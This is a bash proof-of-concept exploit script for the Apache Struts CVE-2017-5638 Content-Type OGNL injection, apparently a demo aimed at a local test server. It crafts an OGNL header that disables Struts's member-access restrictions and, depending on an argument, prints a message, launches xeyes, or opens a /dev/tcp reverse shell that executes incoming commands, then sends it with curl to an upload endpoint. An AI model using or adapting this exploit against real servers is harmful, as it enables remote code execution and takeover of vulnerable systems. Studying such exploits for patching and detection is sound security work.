cve-2017-5638.sh

#!/bin/bash

set -euo pipefail

# write to output stream
payload="(@java.lang.System@out.println('\\n\\n\\n---[ hello Sqreeners ]---'))"

attack=${1:-hello}

if [[ 'shell' == "${attack}" ]]; then

remote_shell_ip=127.0.0.1
remote_shell_port=9999

payload="\
(#cmd={'/bin/bash', '-c', 'exec 5<>/dev/tcp/${remote_shell_ip}/${remote_shell_port};cat <&5 | while read line; do \$line 2>&5 >&5; done'})\
.(#p=new java.lang.ProcessBuilder(#cmd))\
.(#p.redirectErrorStream(true))\
.(#p.start())\
"

fi

if [[ 'xeyes' == "${attack}" ]]; then

payload="(#p=new java.lang.ProcessBuilder('/bin/sh','-c','xeyes')"

fi

# ------------  common stuff  ------------

header="\
%{\
('multipart/form-data')\
.(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)\
.(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])\
.(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))\
.(#ognlUtil.getExcludedPackageNames().clear())\
.(#ognlUtil.getExcludedClasses().clear())\
.(#context.setMemberAccess(#dm))))\
.${payload}\
}\
"

#header="%{('multipart/form-data')}"

file1=$(tempfile)
file2=$(tempfile)

# we have to upload multiple files
curl http://localhost:8080/file-upload/upload.action \
    -F upload=@${file1} \
    -F upload=@${file2} \
    -v \
    -s \
    -H "Content-type: ${header}" \
    -o /dev/null

rm ${file1}
rm ${file2}